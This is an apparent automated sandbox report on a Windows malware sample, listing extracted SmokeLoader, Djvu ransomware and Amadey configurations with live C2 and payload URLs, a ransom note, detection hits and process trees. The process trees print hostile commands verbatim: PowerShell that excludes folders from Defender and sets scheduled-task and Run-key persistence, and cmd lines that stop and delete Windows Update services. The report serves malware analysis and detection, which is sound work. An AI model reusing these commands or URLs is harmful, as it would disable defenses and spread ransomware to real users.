Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
08-03-2023 19:12
Static task
static1
Behavioral task
behavioral1
Sample
163533663c11cecf5c1ab7696f765325f2630dda317a50d8112fb35a82de49cf.exe
Resource
win10-20230220-en
General
-
Target
163533663c11cecf5c1ab7696f765325f2630dda317a50d8112fb35a82de49cf.exe
-
Size
186KB
-
MD5
d234426a2a5547152fbf3ad0d9fd618b
-
SHA1
05cdfa12a7b22b86fbb565da799df8c066765a8b
-
SHA256
163533663c11cecf5c1ab7696f765325f2630dda317a50d8112fb35a82de49cf
-
SHA512
35209cd1e9fad41301e5aee7d3842be02935c80d0a143d39b311074dbba9a1e922b92d4f28f1369383b0996c0d0ee86b944e35063b161efef3517bb90deaf63b
-
SSDEEP
3072:pzpoSoQSzP9AlZEyLPcna8MlJjm13ZGRtLKiyckF:XhoRzPtyLPH//j/3LKP9
Malware Config
Extracted
smokeloader
2022
http://potunulit.org/
http://hutnilior.net/
http://bulimu55t.net/
http://soryytlic4.net/
http://novanosa5org.org/
http://nuljjjnuli.org/
http://tolilolihul.net/
http://somatoka51hub.net/
http://hujukui3.net/
http://bukubuka1.net/
http://golilopaster.org/
http://newzelannd66.org/
http://otriluyttn.org/
http://hoh0aeghwugh2gie.com/
http://hie7doodohpae4na.com/
http://aek0aicifaloh1yo.com/
http://yic0oosaeiy7ahng.com/
http://wa5zu7sekai8xeih.com/
Extracted
djvu
http://zexeq.com/test2/get.php
http://jiqaz.com/lancer/get.php
-
extension
.coaq
-
offline_id
fTU4hYOJ0niv7WAg9utRTzxXv2TcoEvGPJhzIot1
-
payload_url
http://uaery.top/dl/build2.exe
http://zexeq.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-hhA4nKfJBj Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0659JOsie
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Signatures
-
Detected Djvu ransomware 37 IoCs
Processes:
resource yara_rule behavioral1/memory/4304-146-0x0000000004950000-0x0000000004A6B000-memory.dmp family_djvu behavioral1/memory/4052-147-0x00000000021F0000-0x000000000230B000-memory.dmp family_djvu behavioral1/memory/2948-156-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2848-161-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2948-159-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2948-163-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2848-162-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2848-157-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2948-170-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2848-171-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4872-208-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4872-207-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4872-210-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2848-231-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2948-240-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4456-247-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4456-248-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4456-257-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4872-259-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2584-292-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2584-293-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2584-299-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4456-298-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4456-300-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2584-311-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4456-318-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2584-313-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2948-331-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2584-344-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4456-341-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2584-336-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4456-352-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4456-356-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2584-355-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4456-360-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2584-368-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4176-718-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Detects PseudoManuscrypt payload 7 IoCs
Processes:
resource yara_rule behavioral1/memory/3472-595-0x000002917C440000-0x000002917C4B2000-memory.dmp family_pseudomanuscrypt behavioral1/memory/2544-765-0x0000023D81B80000-0x0000023D81BF2000-memory.dmp family_pseudomanuscrypt behavioral1/memory/364-773-0x0000017478090000-0x0000017478102000-memory.dmp family_pseudomanuscrypt behavioral1/memory/364-778-0x0000017478740000-0x00000174787B2000-memory.dmp family_pseudomanuscrypt behavioral1/memory/656-782-0x000001D34E1D0000-0x000001D34E242000-memory.dmp family_pseudomanuscrypt behavioral1/memory/2544-769-0x0000023D82200000-0x0000023D82272000-memory.dmp family_pseudomanuscrypt behavioral1/memory/2228-815-0x000002197C1C0000-0x000002197C232000-memory.dmp family_pseudomanuscrypt -
Detects Smokeloader packer 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2264-122-0x00000000001F0000-0x00000000001F9000-memory.dmp family_smokeloader behavioral1/memory/1532-174-0x00000000004A0000-0x00000000004A9000-memory.dmp family_smokeloader behavioral1/memory/2780-179-0x0000000001F20000-0x0000000001F29000-memory.dmp family_smokeloader -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4424 2384 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3404 2384 rundll32.exe -
PseudoManuscrypt
PseudoManuscrypt is a malware Lazarus’s Manuscrypt targeting government organizations and ICS.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
pid process 3156 -
Executes dropped EXE 11 IoCs
Processes:
659.exeADE.exeD21.exe106E.exe1188.exeADE.exeD21.exe168A.exe188F.exe24C5.exe24C5.exepid process 2896 659.exe 4052 ADE.exe 4304 D21.exe 1532 106E.exe 4040 1188.exe 2948 ADE.exe 2848 D21.exe 2780 168A.exe 1308 188F.exe 1620 24C5.exe 4872 24C5.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 34.142.181.181 -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
659.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe" 659.exe -
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 14 api.2ip.ua 15 api.2ip.ua 16 api.2ip.ua 29 api.2ip.ua 42 api.2ip.ua 48 api.2ip.ua 90 api.2ip.ua -
Suspicious use of SetThreadContext 3 IoCs
Processes:
ADE.exeD21.exe24C5.exedescription pid process target process PID 4052 set thread context of 2948 4052 ADE.exe ADE.exe PID 4304 set thread context of 2848 4304 D21.exe D21.exe PID 1620 set thread context of 4872 1620 24C5.exe 24C5.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exepid process 524 sc.exe 1904 sc.exe 3728 sc.exe 2692 sc.exe 2140 sc.exe 60 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4152 4040 WerFault.exe 1188.exe 4660 2780 WerFault.exe 168A.exe 3876 1308 WerFault.exe 188F.exe 4956 3472 WerFault.exe svchost.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
163533663c11cecf5c1ab7696f765325f2630dda317a50d8112fb35a82de49cf.exe106E.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 163533663c11cecf5c1ab7696f765325f2630dda317a50d8112fb35a82de49cf.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 163533663c11cecf5c1ab7696f765325f2630dda317a50d8112fb35a82de49cf.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 163533663c11cecf5c1ab7696f765325f2630dda317a50d8112fb35a82de49cf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 106E.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 106E.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 106E.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
163533663c11cecf5c1ab7696f765325f2630dda317a50d8112fb35a82de49cf.exepid process 2264 163533663c11cecf5c1ab7696f765325f2630dda317a50d8112fb35a82de49cf.exe 2264 163533663c11cecf5c1ab7696f765325f2630dda317a50d8112fb35a82de49cf.exe 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 3156 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
163533663c11cecf5c1ab7696f765325f2630dda317a50d8112fb35a82de49cf.exe106E.exepid process 2264 163533663c11cecf5c1ab7696f765325f2630dda317a50d8112fb35a82de49cf.exe 1532 106E.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
description pid process Token: SeShutdownPrivilege 3156 Token: SeCreatePagefilePrivilege 3156 Token: SeShutdownPrivilege 3156 Token: SeCreatePagefilePrivilege 3156 Token: SeShutdownPrivilege 3156 Token: SeCreatePagefilePrivilege 3156 -
Suspicious use of WriteProcessMemory 54 IoCs
Processes:
ADE.exeD21.exe24C5.exedescription pid process target process PID 3156 wrote to memory of 2896 3156 659.exe PID 3156 wrote to memory of 2896 3156 659.exe PID 3156 wrote to memory of 2896 3156 659.exe PID 3156 wrote to memory of 4052 3156 ADE.exe PID 3156 wrote to memory of 4052 3156 ADE.exe PID 3156 wrote to memory of 4052 3156 ADE.exe PID 3156 wrote to memory of 4304 3156 D21.exe PID 3156 wrote to memory of 4304 3156 D21.exe PID 3156 wrote to memory of 4304 3156 D21.exe PID 3156 wrote to memory of 1532 3156 106E.exe PID 3156 wrote to memory of 1532 3156 106E.exe PID 3156 wrote to memory of 1532 3156 106E.exe PID 3156 wrote to memory of 4040 3156 1188.exe PID 3156 wrote to memory of 4040 3156 1188.exe PID 3156 wrote to memory of 4040 3156 1188.exe PID 4052 wrote to memory of 2948 4052 ADE.exe ADE.exe PID 4052 wrote to memory of 2948 4052 ADE.exe ADE.exe PID 4052 wrote to memory of 2948 4052 ADE.exe ADE.exe PID 4052 wrote to memory of 2948 4052 ADE.exe ADE.exe PID 4052 wrote to memory of 2948 4052 ADE.exe ADE.exe PID 4052 wrote to memory of 2948 4052 ADE.exe ADE.exe PID 4052 wrote to memory of 2948 4052 ADE.exe ADE.exe PID 4052 wrote to memory of 2948 4052 ADE.exe ADE.exe PID 4052 wrote to memory of 2948 4052 ADE.exe ADE.exe PID 4052 wrote to memory of 2948 4052 ADE.exe ADE.exe PID 4304 wrote to memory of 2848 4304 D21.exe D21.exe PID 4304 wrote to memory of 2848 4304 D21.exe D21.exe PID 4304 wrote to memory of 2848 4304 D21.exe D21.exe PID 4304 wrote to memory of 2848 4304 D21.exe D21.exe PID 4304 wrote to memory of 2848 4304 D21.exe D21.exe PID 4304 wrote to memory of 2848 4304 D21.exe D21.exe PID 4304 wrote to memory of 2848 4304 D21.exe D21.exe PID 4304 wrote to memory of 2848 4304 D21.exe D21.exe PID 4304 wrote to memory of 2848 4304 D21.exe D21.exe PID 4304 wrote to memory of 2848 4304 D21.exe D21.exe PID 3156 wrote to memory of 2780 3156 168A.exe PID 3156 wrote to memory of 2780 3156 168A.exe PID 3156 wrote to memory of 2780 3156 168A.exe PID 3156 wrote to memory of 1308 3156 188F.exe PID 3156 wrote to memory of 1308 3156 188F.exe PID 3156 wrote to memory of 1308 3156 188F.exe PID 3156 wrote to memory of 1620 3156 24C5.exe PID 3156 wrote to memory of 1620 3156 24C5.exe PID 3156 wrote to memory of 1620 3156 24C5.exe PID 1620 wrote to memory of 4872 1620 24C5.exe 24C5.exe PID 1620 wrote to memory of 4872 1620 24C5.exe 24C5.exe PID 1620 wrote to memory of 4872 1620 24C5.exe 24C5.exe PID 1620 wrote to memory of 4872 1620 24C5.exe 24C5.exe PID 1620 wrote to memory of 4872 1620 24C5.exe 24C5.exe PID 1620 wrote to memory of 4872 1620 24C5.exe 24C5.exe PID 1620 wrote to memory of 4872 1620 24C5.exe 24C5.exe PID 1620 wrote to memory of 4872 1620 24C5.exe 24C5.exe PID 1620 wrote to memory of 4872 1620 24C5.exe 24C5.exe PID 1620 wrote to memory of 4872 1620 24C5.exe 24C5.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\163533663c11cecf5c1ab7696f765325f2630dda317a50d8112fb35a82de49cf.exe"C:\Users\Admin\AppData\Local\Temp\163533663c11cecf5c1ab7696f765325f2630dda317a50d8112fb35a82de49cf.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2264
-
C:\Users\Admin\AppData\Local\Temp\659.exeC:\Users\Admin\AppData\Local\Temp\659.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2896 -
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"2⤵PID:3136
-
C:\Users\Admin\AppData\Local\Temp\ADE.exeC:\Users\Admin\AppData\Local\Temp\ADE.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Users\Admin\AppData\Local\Temp\ADE.exeC:\Users\Admin\AppData\Local\Temp\ADE.exe2⤵
- Executes dropped EXE
PID:2948 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\8a98cf7f-dce4-4668-8246-e86ffc3b3684" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:4936 -
C:\Users\Admin\AppData\Local\Temp\ADE.exe"C:\Users\Admin\AppData\Local\Temp\ADE.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:352
-
C:\Users\Admin\AppData\Local\Temp\ADE.exe"C:\Users\Admin\AppData\Local\Temp\ADE.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:4176
-
C:\Users\Admin\AppData\Local\377d5bb8-f8b6-4251-b4bd-ab137e1bb09b\build2.exe"C:\Users\Admin\AppData\Local\377d5bb8-f8b6-4251-b4bd-ab137e1bb09b\build2.exe"5⤵PID:596
-
C:\Users\Admin\AppData\Local\377d5bb8-f8b6-4251-b4bd-ab137e1bb09b\build2.exe"C:\Users\Admin\AppData\Local\377d5bb8-f8b6-4251-b4bd-ab137e1bb09b\build2.exe"6⤵PID:4360
-
C:\Users\Admin\AppData\Local\377d5bb8-f8b6-4251-b4bd-ab137e1bb09b\build3.exe"C:\Users\Admin\AppData\Local\377d5bb8-f8b6-4251-b4bd-ab137e1bb09b\build3.exe"5⤵PID:4704
-
C:\Users\Admin\AppData\Local\Temp\D21.exeC:\Users\Admin\AppData\Local\Temp\D21.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Users\Admin\AppData\Local\Temp\D21.exeC:\Users\Admin\AppData\Local\Temp\D21.exe2⤵
- Executes dropped EXE
PID:2848 -
C:\Users\Admin\AppData\Local\Temp\D21.exe"C:\Users\Admin\AppData\Local\Temp\D21.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:5084
-
C:\Users\Admin\AppData\Local\Temp\D21.exe"C:\Users\Admin\AppData\Local\Temp\D21.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:4456
-
C:\Users\Admin\AppData\Local\5133aa51-6567-4414-b54e-d9a329875496\build2.exe"C:\Users\Admin\AppData\Local\5133aa51-6567-4414-b54e-d9a329875496\build2.exe"5⤵PID:2900
-
C:\Users\Admin\AppData\Local\5133aa51-6567-4414-b54e-d9a329875496\build2.exe"C:\Users\Admin\AppData\Local\5133aa51-6567-4414-b54e-d9a329875496\build2.exe"6⤵PID:5084
-
C:\Users\Admin\AppData\Local\Temp\106E.exeC:\Users\Admin\AppData\Local\Temp\106E.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1532
-
C:\Users\Admin\AppData\Local\Temp\1188.exeC:\Users\Admin\AppData\Local\Temp\1188.exe1⤵
- Executes dropped EXE
PID:4040 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 2162⤵
- Program crash
PID:4152
-
C:\Users\Admin\AppData\Local\Temp\168A.exeC:\Users\Admin\AppData\Local\Temp\168A.exe1⤵
- Executes dropped EXE
PID:2780 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 4842⤵
- Program crash
PID:4660
-
C:\Users\Admin\AppData\Local\Temp\188F.exeC:\Users\Admin\AppData\Local\Temp\188F.exe1⤵
- Executes dropped EXE
PID:1308 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 4842⤵
- Program crash
PID:3876
-
C:\Users\Admin\AppData\Local\Temp\24C5.exeC:\Users\Admin\AppData\Local\Temp\24C5.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Users\Admin\AppData\Local\Temp\24C5.exeC:\Users\Admin\AppData\Local\Temp\24C5.exe2⤵
- Executes dropped EXE
PID:4872 -
C:\Users\Admin\AppData\Local\Temp\24C5.exe"C:\Users\Admin\AppData\Local\Temp\24C5.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:1208
-
C:\Users\Admin\AppData\Local\Temp\24C5.exe"C:\Users\Admin\AppData\Local\Temp\24C5.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:2584
-
C:\Users\Admin\AppData\Local\1f723cb8-937f-4c0e-903d-0fb9e1c75de2\build3.exe"C:\Users\Admin\AppData\Local\1f723cb8-937f-4c0e-903d-0fb9e1c75de2\build3.exe"5⤵PID:2052
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"6⤵
- Creates scheduled task(s)
PID:432 -
C:\Users\Admin\AppData\Local\1f723cb8-937f-4c0e-903d-0fb9e1c75de2\build2.exe"C:\Users\Admin\AppData\Local\1f723cb8-937f-4c0e-903d-0fb9e1c75de2\build2.exe"5⤵PID:3984
-
C:\Users\Admin\AppData\Local\1f723cb8-937f-4c0e-903d-0fb9e1c75de2\build2.exe"C:\Users\Admin\AppData\Local\1f723cb8-937f-4c0e-903d-0fb9e1c75de2\build2.exe"6⤵PID:4128
-
C:\Users\Admin\AppData\Local\Temp\2FB3.exeC:\Users\Admin\AppData\Local\Temp\2FB3.exe1⤵PID:4432
-
C:\Users\Admin\AppData\Local\Temp\ss31.exe"C:\Users\Admin\AppData\Local\Temp\ss31.exe"2⤵PID:1020
-
C:\Users\Admin\AppData\Local\Temp\zm.exe"C:\Users\Admin\AppData\Local\Temp\zm.exe"2⤵PID:1224
-
C:\Users\Admin\AppData\Local\Temp\zm.exe"C:\Users\Admin\AppData\Local\Temp\zm.exe" -h3⤵PID:4008
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"2⤵PID:408
-
C:\Users\Admin\AppData\Local\Temp\Player3.exe"C:\Users\Admin\AppData\Local\Temp\Player3.exe"2⤵PID:1840
-
C:\Users\Admin\AppData\Local\Temp\37E2.exeC:\Users\Admin\AppData\Local\Temp\37E2.exe1⤵PID:5048
-
C:\Users\Admin\AppData\Local\Temp\ss31.exe"C:\Users\Admin\AppData\Local\Temp\ss31.exe"2⤵PID:868
-
C:\Users\Admin\AppData\Local\Temp\zm.exe"C:\Users\Admin\AppData\Local\Temp\zm.exe"2⤵PID:2076
-
C:\Users\Admin\AppData\Local\Temp\zm.exe"C:\Users\Admin\AppData\Local\Temp\zm.exe" -h3⤵PID:1920
-
C:\Users\Admin\AppData\Local\Temp\Player3.exe"C:\Users\Admin\AppData\Local\Temp\Player3.exe"2⤵PID:1836
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"2⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\4243.exeC:\Users\Admin\AppData\Local\Temp\4243.exe1⤵PID:2124
-
C:\Users\Admin\AppData\Local\Temp\4AC0.exeC:\Users\Admin\AppData\Local\Temp\4AC0.exe1⤵PID:3592
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force1⤵PID:4852
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force1⤵PID:2976
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }1⤵PID:1836
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 01⤵PID:2536
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 02⤵PID:4032
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 02⤵PID:3968
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 02⤵PID:4156
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 02⤵PID:2420
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f1⤵PID:2396
-
C:\Windows\System32\sc.exesc stop UsoSvc2⤵
- Launches sc.exe
PID:2692 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2140 -
C:\Windows\System32\sc.exesc stop wuauserv2⤵
- Launches sc.exe
PID:524 -
C:\Windows\System32\sc.exesc stop bits2⤵
- Launches sc.exe
PID:3728
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
PID:4424 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵PID:5092
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
PID:3404 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵PID:2864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k WspService1⤵PID:656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k WspService1⤵PID:3472
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3472 -s 4922⤵
- Program crash
PID:4956
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }1⤵PID:2164
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 01⤵PID:4000
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 02⤵PID:4704
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 02⤵PID:924
-
